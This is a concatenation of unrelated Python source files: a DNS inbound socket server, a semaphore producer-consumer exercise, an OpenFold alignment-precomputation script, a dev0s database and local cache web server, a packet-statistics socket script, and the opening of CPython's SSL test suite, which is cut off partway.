StreamHandler.set_inbound_handler(inbound_handler)
self.logger = logging.getLogger("encrypted_dns.inbound.StreamInbound <{}:{}>".format(
self.host,
self.port
))
self.thread = None
self.inbound_server = None
self.logger.info("Initialized.")
def _serve(self) -> None:
if StreamHandler.inbound_handler is None:
err_msg = "Cannot start the server; no inbound handler is set"
self.logger.error(err_msg)
raise RuntimeError(err_msg)
if self.addr_fam is not None:
socketserver.ThreadingTCPServer.address_family = self.addr_fam
self.inbound_server = socketserver.ThreadingTCPServer(
(self.host, self.port),
StreamHandler
)
self.inbound_server.serve_forever()
# server is shutdown at this point
self.inbound_server = None
def start(self) -> None:
if (self.thread is not None) or (self.inbound_server is not None):
err_msg = "Server is already started."
self.logger.warning(err_msg)
return None
self.thread = threading.Thread(target=self._serve)
self.thread.start()
self.logger.info("Server started")
def stop(self) -> None:
if (self.inbound_server is not None):
self.inbound_server.shutdown()
if (self.thread is not None):
self.thread.join()
self.thread = None
self.logger.info("Server stopped")
|
pl6_ex21.py
|
#-*- coding : utf-8 -*-
from multiprocessing import Process, Array, Semaphore
import random, time
MAX_SIZE = 1
buffer = Array("i", MAX_SIZE)
empty = Semaphore(MAX_SIZE) #Inicialmente, MAX_SIZE posicoes livres
full = Semaphore(0) #Inicialmente, 0 posicoes ocupadas
def produtor():
while True:
nextProduced = random.randint(1,100)
empty.acquire() #Ha’ posicoes livres?
buffer[0] = nextProduced
full.release() #Informo que há nova posicao ocupada
print ("+++Produzi " + str(nextProduced))
time.sleep(random.randint(0,3)) #descanso um pouco
def consumidor():
while True:
full.acquire()
nextConsumed = buffer[0]
empty.release()
print ("---Consumi " + str(nextConsumed))
time.sleep(random.randint(0,3)) #descanso um pouco
prod = Process(target=produtor)
cons = Process(target=consumidor)
prod.start()
cons.start()
prod.join()
cons.join()
|
precompute_alignments.py
|
import argparse
from functools import partial
import json
import logging
import os
import threading
from multiprocessing import cpu_count
from shutil import copyfile
import tempfile
import time
import pickle
import openfold.data.mmcif_parsing as mmcif_parsing
from openfold.data.data_pipeline import AlignmentRunner
from openfold.data.parsers import parse_fasta
from openfold.np import protein, residue_constants
from openfold.data import data_pipeline
from utils import add_data_args
logging.basicConfig(level=logging.WARNING)
def run_seq_group_alignments(seq_groups, alignment_runner, args):
dirs = set(os.listdir(args.output_dir))
for seq, names in seq_groups:
first_name = names[0]
alignment_dir = os.path.join(args.output_dir, first_name)
try:
os.makedirs(alignment_dir)
except Exception as e:
logging.warning(f"Failed to create directory for {first_name} with exception {e}...")
continue
fd, fasta_path = tempfile.mkstemp(suffix=".fasta")
with os.fdopen(fd, 'w') as fp:
fp.write(f'>query\n{seq}')
try:
alignment_runner.run(
fasta_path, alignment_dir
)
except:
logging.warning(f"Failed to run alignments for {first_name}. Skipping...")
os.remove(fasta_path)
os.rmdir(alignment_dir)
continue
os.remove(fasta_path)
for name in names[1:]:
if(name in dirs):
logging.warning(
f'{name} has already been processed. Skipping...'
)
continue
cp_dir = os.path.join(args.output_dir, name)
os.makedirs(cp_dir, exist_ok=True)
for f in os.listdir(alignment_dir):
copyfile(os.path.join(alignment_dir, f), os.path.join(cp_dir, f))
def parse_and_align(files, alignment_runner, args):
for f in files:
path = os.path.join(args.input_dir, f)
file_id = os.path.splitext(f)[0]
seq_group_dict = {}
if(f.endswith('.cif')):
with open(path, 'r') as fp:
mmcif_str = fp.read()
mmcif = mmcif_parsing.parse(
file_id=file_id, mmcif_string=mmcif_str
)
if(mmcif.mmcif_object is None):
logging.warning(f'Failed to parse {f}...')
if(args.raise_errors):
raise list(mmcif.errors.values())[0]
else:
continue
mmcif = mmcif.mmcif_object
for chain_letter, seq in mmcif.chain_to_seqres.items():
chain_id = '_'.join([file_id, chain_letter])
l = seq_group_dict.setdefault(seq, [])
l.append(chain_id)
elif(f.endswith('.fasta') or f.endswith('.fa')):
with open(path, 'r') as fp:
fasta_str = fp.read()
input_seqs, _ = parse_fasta(fasta_str)
if len(input_seqs) != 1:
msg = f'More than one input_sequence found in {f}'
if(args.raise_errors):
raise ValueError(msg)
else:
logging.warning(msg)
input_sequence = input_seqs[0]
seq_group_dict[input_sequence] = [file_id]
elif(f.endswith('.core')):
with open(path, 'r') as fp:
core_str = fp.read()
core_prot = protein.from_proteinnet_string(core_str)
aatype = core_prot.aatype
seq = ''.join([
residue_constants.restypes_with_x[aatype[i]]
for i in range(len(aatype))
])
seq_group_dict[seq] = [file_id]
else:
continue
seq_group_tuples = [(k,v) for k,v in seq_group_dict.items()]
run_seq_group_alignments(seq_group_tuples, alignment_runner, args)
# Debug: compute feature and save
def _parse_mmcif(feat_data_pipeline, path, file_id, chain_id, alignment_dir, _alignment_index):
with open(path, 'r') as f:
mmcif_string = f.read()
mmcif_object = mmcif_parsing.parse(
file_id=file_id, mmcif_string=mmcif_string
)
# Crash if an error is encountered. Any parsing errors should have
# been dealt with at the alignment stage.
if(mmcif_object.mmcif_object is None):
raise list(mmcif_object.errors.values())[0]
mmcif_object = mmcif_object.mmcif_object
data = feat_data_pipeline.process_mmcif(
mmcif=mmcif_object,
alignment_dir=alignment_dir,
chain_id=chain_id,
)
#_alignment_index=_alignment_index
return data
if (args.preprocess_feat):
print("Starting feature processing")
template_featurizer = None
feat_data_pipeline = data_pipeline.DataPipeline(
template_featurizer=template_featurizer,
)
if(f.endswith('.cif')):
for seq, names in seq_group_tuples:
first_name = str(names[0])
chain_id = first_name.split(sep="_")[1]
alignment_dir = os.path.join(args.output_dir, first_name)
data = _parse_mmcif(
feat_data_pipeline=feat_data_pipeline,
path=path, file_id=file_id, chain_id=chain_id,
alignment_dir=alignment_dir,
_alignment_index=None
)
# Save feat
pkl_dir = os.path.join(args.output_dir, first_name)
# try:
# os.makedirs(pkl_dir)
# except Exception as e:
# logging.warning(f"Failed to create feature directory for {first_name} with exception {e}...")
# continue
pkl_path = os.path.join(pkl_dir, "feat.pkl")
try:
with open(pkl_path, "wb") as f:
pickle.dump(data, f, protocol=4)
except Exception as e:
logging.warning(f"Failed to dump feature for {first_name} with exception {e}...")
continue
def main(args):
# Build the alignment tool runner
alignment_runner = AlignmentRunner(
jackhmmer_binary_path=args.jackhmmer_binary_path,
hhblits_binary_path=args.hhblits_binary_path,
hhsearch_binary_path=args.hhsearch_binary_path,
uniref90_database_path=args.uniref90_database_path,
mgnify_database_path=args.mgnify_database_path,
bfd_database_path=args.bfd_database_path,
uniclust30_database_path=args.uniclust30_database_path,
pdb70_database_path=args.pdb70_database_path,
use_small_bfd=args.use_small_bfd,
no_cpus=args.cpus_per_task,
)
#use_small_bfd=args.bfd_database_path is None,
files = list(os.listdir(args.input_dir))
# Do some filtering
if(args.mmcif_cache is not None):
with open(args.mmcif_cache, "r") as fp:
cache = json.load(fp)
else:
cache = None
dirs = []
if(cache is not None and args.filter):
dirs = set(os.listdir(args.output_dir))
def prot_is_done(f):
prot_id = os.path.splitext(f)[0]
if(prot_id in cache):
chain_ids = cache[prot_id]["chain_ids"]
for c in chain_ids:
full_name = prot_id + "_" + c
if(not full_name in dirs):
return False
else:
return False
return True
files = [f for f in files if not prot_is_done(f)]
def split_up_arglist(arglist):
# Split up the survivors
if(os.environ.get("SLURM_JOB_NUM_NODES", 0)):
num_nodes = int(os.environ["SLURM_JOB_NUM_NODES"])
if(num_nodes > 1):
node_id = int(os.environ["SLURM_NODEID"])
logging.warning(f"Num nodes: {num_nodes}")
logging.warning(f"Node ID: {node_id}")
arglist = arglist[node_id::num_nodes]
t_arglist = []
for i in range(args.no_tasks):
t_arglist.append(arglist[i::args.no_tasks])
return t_arglist
if(cache is not None and "seqs" in next(iter(cache.values()))):
seq_group_dict = {}
for f in files:
prot_id = os.path.splitext(f)[0]
if(prot_id in cache):
prot_cache = cache[prot_id]
chains_seqs = zip(
prot_cache["chain_ids"], prot_cache["seqs"]
)
for chain, seq in chains_seqs:
chain_name = prot_id + "_" + chain
if(chain_name not in dirs):
l = seq_group_dict.setdefault(seq, [])
l.append(chain_name)
func = partial(run_seq_group_alignments,
alignment_runner=alignment_runner,
args=args
)
seq_groups = [(k,v) for k,v in seq_group_dict.items()]
# Sort them by group length so the tasks are approximately balanced
seq_groups = sorted(seq_groups, key=lambda x: len(x[1]))
task_arglist = [[a] for a in split_up_arglist(seq_groups)]
else:
func = partial(parse_and_align,
alignment_runner=alignment_runner,
args=args,
)
task_arglist = [[a] for a in split_up_arglist(files)]
t0 = time.time()
print(f"Starting search and alignment")
threads = []
for i, task_args in enumerate(task_arglist):
print(f"Started thread {i}...")
t = threading.Thread(target=func, args=task_args)
threads.append(t)
t.start()
for t in threads:
t.join()
print("total time : {}".format(time.time() - t0))
logging.info("total time : {}".format(time.time() - t0))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"input_dir", type=str,
help="""Path to directory containing mmCIF, FASTA and/or ProteinNet
.core files"""
)
parser.add_argument(
"output_dir", type=str,
help="Directory in which to output alignments"
)
add_data_args(parser)
parser.add_argument(
"--raise_errors", type=bool, default=False,
help="Whether to crash on parsing errors"
)
parser.add_argument(
"--cpus_per_task", type=int, default=cpu_count(),
help="Number of CPUs to use"
)
parser.add_argument(
"--mmcif_cache", type=str, default=None,
help="Path to mmCIF cache. Used to filter files to be parsed"
)
parser.add_argument(
"--no_tasks", type=int, default=1,
)
parser.add_argument(
"--filter", type=bool, default=True,
)
parser.add_argument(
"--use_small_bfd", type=bool, default=True,
)
parser.add_argument(
"--preprocess_feat", type=bool, default=False,
)
args = parser.parse_args()
main(args)
|
__init__.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# imports.
from dev0s.classes.defaults.objects import *
from dev0s.classes.defaults.defaults import defaults
from dev0s.classes.defaults.exceptions import Exceptions
from dev0s.classes.response import response as _response_
from dev0s.classes.requests import requests as _requests_
from dev0s.classes import code
import requests as __requests__
# the database class.
class Database(Traceback):
def __init__(self,
# the path to the directory (str) (#1)
path=None,
# root permission required.
sudo=False,
):
# docs.
DOCS = {
"module":"dev0s.database.Database",
"initialized":False,
"description":[],
"chapter": "Database", }
# traceback.
Traceback.__init__(self, traceback="Database")
# checks.
if path == None: raise Exceptions.InvalidUsage(self.__traceback__()+" Define parameter [path].")
# args.
self.path = gfp.clean(path)
self.sudo = sudo
# sys args.
self.__cache__ = {}
# attributes.
self.dir = self.directory = Directory(self.path)
# checks.
if not self.dir.fp.exists(sudo=sudo):
if self.sudo: _response_.log(f"&ORANGE&Root permission&END& required to create database [{self.path}].")
Files.create(str(self.path), sudo=self.sudo, directory=True, permission=700, owner=defaults.vars.user, group=defaults.vars.group,)
# copy objects.
self.fp = self.file_path = self.dir.fp
self.ownership = self.fp.ownership
self.permission = self.fp.permission
# copy functions.
self.join = self.dir.join
self.subpath = self.dir.subpath
self.fullpath = self.dir.fullpath
#
# load an object.
def load(self,
# the sub path (str, FilePath) (#1).
path=None,
# the data format [bool, str, int, float, dict, list] (str) (#2).
format="dict",
# the default data (bool, str, int, float, dict, list).
default=None,
):
if path == None: return _response_.error(self.__traceback__(function="load")+" Define parameter: [path].")
path = str(path)
subpath = path
path = gfp.clean(f"{self.path}/{path}")
format = self.__serialize_format__(format)
if default != None and not Files.exists(path):
response = self.save(path=subpath, data=default, format=format)
if not response.success: return response
try:
if format in ["bytes"]:
obj = Bytes(path=path, load=True)
elif format in ["bool"]:
obj = Boolean(path=path, load=True)
elif format in ["str"]:
obj = String(path=path, load=True)
elif format in ["int", "float"]:
obj = Integer(path=path, load=True)
elif format in ["list"]:
obj = Array(path=path, load=True)
elif format in ["dict"]:
obj = Dictionary(path=path, load=True)
except Exception as e: return _response_.error(str(e))
return _response_.success(f"Successfully loaded [{path}].", {
"data":obj,
})
# save an object.
def save(self,
# the sub path (str, FilePath) (#1).
path=None,
# the data to save (bool, str, int, float, dict, list) (#2)
data=None,
# the data format [bool, str, int, float, dict, list] (str) (#3).
format="dict",
# with overwrite disabled the dict format data is inserted into the existing data (bool).
overwrite=False,
):
if path == None: return _response_.error(self.__traceback__(function="save")+" Define parameter: [path].")
if data == None: return _response_.error(self.__traceback__(function="save")+" Define parameter: [data].")
path = str(path)
path = gfp.clean(f"{self.path}/{path}")
format = self.__serialize_format__(format)
try:
if not Files.exists(path=gfp.base(path)): Files.create(path=gfp.base(path), directory=True)
except ValueError: a=1
try:
if format in ["bytes"]:
obj = Bytes(data, path=path)
elif format in ["bool"]:
obj = Boolean(data, path=path)
elif format in ["str"]:
obj = String(data, path=path)
elif format in ["int", "float"]:
obj = Integer(data, path=path)
elif format in ["list"]:
obj = Array(data, path=path)
elif format in ["dict"]:
obj = Dictionary({}, path=path)
if format in ["dict"]:
if overwrite:
obj.save(dictionary=data)
else:
if obj.fp.exists():
obj.load()
else:
obj.dictionary = {}
obj.insert(data)
obj.save()
else:
obj.save()
except Exception as e: return _response_.error(str(e))
return _response_.success(f"Successfully saved [{path}].")
# delete an object.
def delete(self,
# the sub path (str, FilePath) (#1).
path=None,
):
if path == None: return _response_.error(self.__traceback__(function="delete")+" Define parameter: [path].")
path = gfp.clean(f"{self.path}/{path}")
try:
Files.delete(path=path)
except Exception as e: return _response_.error(str(e))
if Files.exists(path): return _response_.error(f"Failed to delete [{path}].")
return _response_.success(f"Successfully deleted [{path}].")
# get the paths of a directory.
def paths(self,
# the sub path (leave None to use the root path) (str FilePath)
path=None,
# get recursively (bool).
recursive=False,
# get files only (bool).
files_only=False,
# get firs only (bool).
dirs_only=False,
# also get empty dirs (bool).
empty_dirs=True,
# get the full path (bool).
full_path=False,
# the banned full paths (list).
banned=[],
# the banned names (list).
banned_names=[".DS_Store"],
# the banend base names (list).
banned_basenames=["__pycache__"],
# the allowed extensions (list).
extensions=["*"],
):
# checks.
#if path == None: return _response_.error(self.__traceback__(function="names")+" Define parameter: [path].")
if path == None: path = self.path
else: path = self.join(path)
path = str(path)
if not Files.directory(path):
raise dev0s.exceptions.InvalidUsage(f"Defined path [{path}] is not a directory.")
# handler.
paths = Directory(path).paths(
# get recursively (bool).
recursive=recursive,
# get files only (bool).
files_only=files_only,
# get firs only (bool).
dirs_only=dirs_only,
# also get empty dirs (bool).
empty_dirs=empty_dirs,
# the banned full paths (list).
banned=banned,
# the banned names (list).
banned_names=banned_names,
# the banend base names (list).
banned_basenames=banned_basenames,
# the allowed extensions (list).
extensions=extensions, )
if full_path:
return paths
else:
_paths_ = []
for i in paths: _paths_.append(self.subpath(i))
return _paths_
#
# get the paths of a directory.
def names(self,
# the sub path (leave None to use the root path)
path=None,
# get recursively (bool).
recursive=False,
# get files only (bool).
files_only=False,
# get firs only (bool).
dirs_only=False,
# also get empty dirs (bool).
empty_dirs=True,
# remove the extension names (bool).
remove_extensions=False,
# the banned full paths (list).
banned=[],
# the banned names (list).
banned_names=[".DS_Store"],
# the banend base names (list).
banned_basenames=["__pycache__"],
# the allowed extensions (list).
extensions=["*"],
):
# checks.
#if path == None: return _response_.error(self.__traceback__(function="names")+" Define parameter: [path].")
if path == None: path = self.path
else: path = self.join(path)
if not Files.directory(path):
raise dev0s.exceptions.InvalidUsage(f"Defined path [{path}] is not a directory.")
# handler.
return Directory(path).names(
# get recursively (bool).
recursive=recursive,
# get files only (bool).
files_only=files_only,
# get firs only (bool).
dirs_only=dirs_only,
# also get empty dirs (bool).
empty_dirs=empty_dirs,
# remove the extension names (bool).
remove_extensions=remove_extensions,
# the banned full paths (list).
banned=banned,
# the banned names (list).
banned_names=banned_names,
# the banend base names (list).
banned_basenames=banned_basenames,
# the allowed extensions (list).
extensions=extensions,
)
#
# representation.
def __str__(self):
return str(self.dir.fp.path)
def __repr__(self):
return str(self)
# sys functions.
def __serialize_format__(self, format):
format = str(format).lower()
if format in ["bytes", "Bytes", bytes, Bytes]: format = "bytes"
elif format in ["bool", "Boolean", bool, Boolean]: format = "bool"
elif format in ["string", "str", "String", str, String]: format = "str"
elif format in ["int", "integer", int]: format = "int"
elif format in ["float", float, Integer]: format = "float"
elif format in ["list", "array", "Array", list, Array]: format = "list"
elif format in ["dict", "dictionary", "Dictionary", dict, Dictionary]: format = "dict"
if format not in ["bytes", "bool", "str", "int", "float", "dict", "list"]: raise Exceptions.InvalidUsage(f"{self.__traceback__()}: Format [{format}] is not a valid option, options: [bool, str, int, float, dict, list].")
return format
#
# the webserver database object class.
# keeps all info in python memory only.
class WebServer(Thread):
def __init__(self,
id="webserver",
host="127.0.0.1",
port=52379,
sleeptime=3,
log_level=0,
# do not use.
serialized={},
):
# docs.
DOCS = {
"module":"dev0s.database.WebServer",
"initialized":False,
"description":[],
"chapter": "Database", }
# defaults.
Thread.__init__(self)
# check home dir.
for dir in [
f"{defaults.vars.home}/.{ALIAS}",
f"{defaults.vars.home}/.{ALIAS}/.cache",
]:
if not Files.exists(dir):
Files.create(dir, directory=True, owner=defaults.vars.user, permission=700)
# by serialization.
if serialized != {}:
self.assign(serialized, keys={
"id":"webserver",
"host":"127.0.0.1",
"port":52379,
"sleeptime":3,
"log_level":0,
})
# by args.
else:
self.id = id
self.host = host
self.port = port
self.sleeptime = sleeptime
self.log_level = log_level
# check parameters.
_response_.parameters.check(
# the parameters (dict) (#1).
parameters={
"id:str,String":self.id,
"host:str,String":self.host,
"port:str,String,int,float,Integer":self.port,
"sleeptime:str,String,int,float,Integer":self.sleeptime,
"log_level:str,String,int,float,Integer":self.log_level,
},
# the traceback id.
traceback=self.__traceback__(),).crash(error_only=True)
# attribibutes.
self.cache = {}
self.system_cache = Database(path=Files.join(defaults.vars.home, f"/.{ALIAS}/.cache/{self.id}/")) # only used for tokens, rest is stored in python memory only.
# checks.
self.log_level = int(self.log_level)
self.port = int(self.port)
self.sleeptime = int(self.sleeptime)
self.id = self.id.replace(" ","-")
self.tag = self.id.replace(" ","_")
#
# cache functions.
def set(self, group=None, id=None, data=None, timeout=3):
encoded = _requests_.encode({
"group":group.replace(" ","_"),
"id":id.replace(" ","_"),
"data":data,
"token":self.token,
"cache":self.system_cache.path,
"cache_id":self.id,
})
try:
response = __requests__.get(f'http://{self.host}:{self.port}/set?{encoded}', timeout=timeout)
except Exception as e:
return _response_.error(f"Failed to connect with {self.host}:{self.port}, error: {e}")
try:
response = self.__serialize__(response.json())
except:
return _response_.error(f"Failed to serialize {response}: {response.text}")
return _response_.response(response)
def get(self, group=None, id=None, timeout=3):
encoded = _requests_.encode({
"group":group.replace(" ","_"),
"id":id.replace(" ","_"),
"token":self.token,
"cache":self.system_cache.path,
"cache_id":self.id,
})
try:
response = __requests__.get(f'http://{self.host}:{self.port}/get?{encoded}', timeout=timeout)
except Exception as e:
return _response_.error(f"Failed to connect with {self.host}:{self.port}, error: {e}")
try:
response = self.__serialize__(response.json())
except:
return _response_.error(f"Failed to serialize {response}: {response.text}")
return _response_.response(response,)
#
# flask app.
def app(self):
app = flask.Flask(__name__)
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
@app.route('/get')
def get():
token = flask.request.args.get('token')
if token != Database(path=flask.request.args.get('cache')).load(Files.join(flask.request.args.get('cache_id'), "token")):
return _response_.error(f"Provided an invalid token {token}.").json()
group = flask.request.args.get('group')
id = flask.request.args.get('id')
if id in ["none", "null", "None"]: id = None
try:
if id == None:
tag = f"{group}"
value = self.cache[group]
else:
tag = f"{group}:{id}"
value = self.cache[group][id]
except KeyError:
return _response_.error(f"There is no data cached for {tag}.").json()
return _response_.success(f"Successfully retrieved {tag}.", {
"group":group,
"id":id,
"data":value,
}).json()
@app.route('/set')
def set():
token = flask.request.args.get('token')
if token != Database(path=flask.request.args.get('cache')).load(Files.join(flask.request.args.get('cache_id'), "token")):
return _response_.error(f"Provided an invalid token {token}.").json()
group = flask.request.args.get('group')
id = flask.request.args.get('id')
if id in ["none", "null", "None"]: id = None
value = flask.request.args.get('data')
if id == None:
tag = f"{group}"
self.cache[group] = value
else:
tag = f"{group}:{id}"
try: self.cache[group]
except KeyError: self.cache[group] = {}
self.cache[group][id] = value
return _response_.success(f"Successfully cached {tag}.").json()
@app.route('/active')
def active():
token = flask.request.args.get('token')
if token != Database(path=flask.request.args.get('cache')).load(Files.join(flask.request.args.get('cache_id'), "token")):
return _response_.error(f"Provided an invalid token {token}.").json()
return _response_.success(f"Active.").json()
#def run__(self, app, host, port):
# app.run(host=host, port=port)
#self.process = multiprocessing.Process(target=app.run, args=(self, app, self.host,self.port,))
#self.process.start()
app.run(host=self.host, port=self.port)
#
# control functions.
def run(self):
self.system_cache.save(path=f"{self.id}/daemon", data="*running*", format="str")
self.system_cache.save(path=f"{self.id}/token", data=String().generate(length=64, digits=True, capitalize=True), format="str")
self.app()
self.system_cache.save(path=f"{self.id}/daemon", data="*stopped*", format="str")
def fork(self, timeout=15, sleeptime=1):
if self.running:
return _response_.success(f"The {self.id} is already running.")
if self.log_level <= 0:
print(f"Starting the {self.id}.")
serialized = self.dict(keys={
"id":"webserver",
"host":"127.0.0.1",
"port":52379,
"sleeptime":3,
"log_level":0,
})
for i in ["__cache__", "cache", "system_cache" ,"_stder", "_traceback_", "_name", "_daemonic", "_ident", "_native_id", "_tstate_lock", "_started", "_stderr", "_initialized", "_invoke_excepthook", "__status__", "__running__", "__response__", "_is_stopped", "_args", "_kwargs", "_target", "_raw_traceback_",]:
try: del serialized[i]
except: a=1
serialized = f"{serialized}"
command = [str(defaults.vars.executable), f"{SOURCE_PATH}classes/database/fork.py", "--serialized", f"'{serialized}'", "--dev0s-webserver-tag", self.tag]
if self.log_level < 0:
command += [ "2>", "/dev/null"]
p = subprocess.Popen(command)
success = False
for i in range(int(timeout/sleeptime)):
if self.running:
success = True
break
time.sleep(sleeptime)
if success:
return _response_.success(f"Successfully started the {self.id}.")
else:
return _response_.error(f"Failed to start the {self.id}.")
def stop(self):
if not self.running:
return _response_.success(f"{self.__traceback__(function='stop')}: The {self.id} is not running.")
processes = code.processes(includes=f"--dev0s-webserver-tag {self.tag}")
if not processes.success: return response
if len(processes.processes) <= 1:
return _response_.error(f"Unable to find the pid of the {self.id}.")
for pid, info in processes.processes.items():
if info["process"] not in ["grep"]:
response = code.kill(pid=pid)
if not response.success: return response
return _response_.error(f"Successfully stopped the {self.id}.")
#
# threading functions.
def start_thread(self, thread, group="daemons", id=None):
response = self.set(group=group, id=id, data=thread)
if not response.success: return response
response = thread.start()
if response != None:
try: success = bool(response["success"])
except: success = True
if not success: return response
try:
id = thread.id
except:
id = str(thread)
return _response_.success(f"Successfully started [{id}].")
def get_thread(self, group="daemos", id=None):
response = self.get(group=group, id=id)
if not response.success:
if "There is no data cached for" in response.error:
return _response_.error(f"There is no thread cached for (group: {group}), (id: {id}).")
else: return response
thread = response.data
return _response_.success(f"Successfully retrieved thread [{thread}].", {
"thread":thread,
})
#
# properties.
@property
def token(self):
if random.randrange(1, 100) <= 5:
response = self.system_cache.save(path=f"{self.id}/token", data=String().generate(length=64, digits=True, capitalize=True), format="str")
if not response.success: response.crash()
response = self.system_cache.load(path=f"{self.id}/token", format="str")
if response.success and "None" not in str(response.data):
return response.data
else:
response = self.system_cache.save(path=f"{self.id}/token", data=String().generate(length=64, digits=True, capitalize=True), format="str")
if not response.success: response.crash()
response = self.system_cache.load(path=f"{self.id}/token", format="str")
if response.success and "None" not in str(response.data):
return response.data
else:
if response.error == None:
response.error = f"Failed to create a token for webserver [{self.id}] ({self.system_cache.join(self.id+'/token')})."
response.crash()
@property
def running(self):
return self.__running__()
def __running__(self, timeout=3):
encoded = _requests_.encode({
"token":self.token,
"cache":self.system_cache.path,
"cache_id":self.id,
})
try:
__requests__.get(f'http://{self.host}:{self.port}/active?{encoded}', timeout=timeout)
return True
except __requests__.exceptions.ConnectionError:
return False
#
# system functions.
def __serialize__(self, dictionary, safe=False):
if isinstance(dictionary, (Dictionary, dict)):
new = {}
for key, value in dictionary.items():
if value in ["False", "false"]: new[key] = False
elif value in ["True", "true"]: new[key] = True
elif value in ["None", "none", "null", "nan"]: new[key] = None
elif isinstance(value, (dict, Dictionary, list, Array)):
new[key] = self.__serialize__(value, safe=safe)
elif isinstance(value, object):
if not safe:
new[key] = value
else:
try:
int(value)
new[key] = int(value)
except:
new[key] = value
return new
if isinstance(dictionary, (Dictionary, dict)):
new = []
for value in dictionary:
if value in ["False", "false"]: new.append(False)
elif value in ["True", "true"]: new.append(True)
elif value in ["None", "none", "null", "nan"]: new.append(None)
elif isinstance(value, (dict, Dictionary)):
new.append(self.__serialize__(value, safe=safe))
elif isinstance(value, object):
if not safe:
new.append(value)
else:
try:
int(value)
new.append(int(value))
except:
new.append(value)
return new
else: raise ValueError(f"Parameter [dictionary] requires to be a [dict, Dictionary, list, Array], not [{dictionary.__class__.__name__}].")
#
#
|
statistics.py
|
#!/usr/bin/env python
import time
import os
import sys
import socket
import ast
import threading
from utils import *
socket_file = '/var/run/statistics_socket'
# Make sure the socket does not already exist
try:
os.unlink(socket_file)
except OSError:
if os.path.exists(socket_file):
raise
class Statistics():
def __init__(self):
self.conn, self.db = connect('remote')
self.results = self.conn['results']['results_stats']
# Collections
self.coll_rules = self.db['rules']
self.coll_vnf = self.db['vnf']
self.socket_file = socket_file
port = self.coll_vnf.find_one({'_id': 'Statistics'}, {'port': 1})['port']
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.socket.bind(self.socket_file)
self.socket.listen(1)
def create_results(self, rule):
"""
Create rule results
"""
doc = {'_id': rule}
doc['Total Packets'] = 0
doc['Total Bytes'] = 0
self.results.insert(doc)
return doc
def update_document(self, rule_id, pkt):
"""
Update a document
"""
results[rule_id]['Total Packets'] += 1
results[rule_id]['Total Bytes'] += pkt['Size']
def update_data(self):
"""
Write to database in-memory results
"""
conn, db = connect('remote')
coll_results = conn['results']['results_stats']
while True:
time.sleep(1)
for rule_id, node_result in results.iteritems():
coll_results.update_one(
{'_id': rule_id},
{
'$set': {
'Total Packets': node_result['Total Packets'],
'Total Bytes': node_result['Total Bytes']
}
})
global results
results = {}
statistic = Statistics()
connection = statistic.socket.accept()[0]
updater = threading.Thread(target=statistic.update_data)
updater.start()
while True:
size = connection.recv(3)
data = connection.recv(int(size))
data = data.replace("'", "\"")
pkt = ast.literal_eval(data)
for rule_id in pkt['rules']:
if not statistic.results.count({'_id': rule_id}):
results[rule_id] = statistic.create_results(rule_id)
statistic.update_document(rule_id, pkt)
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
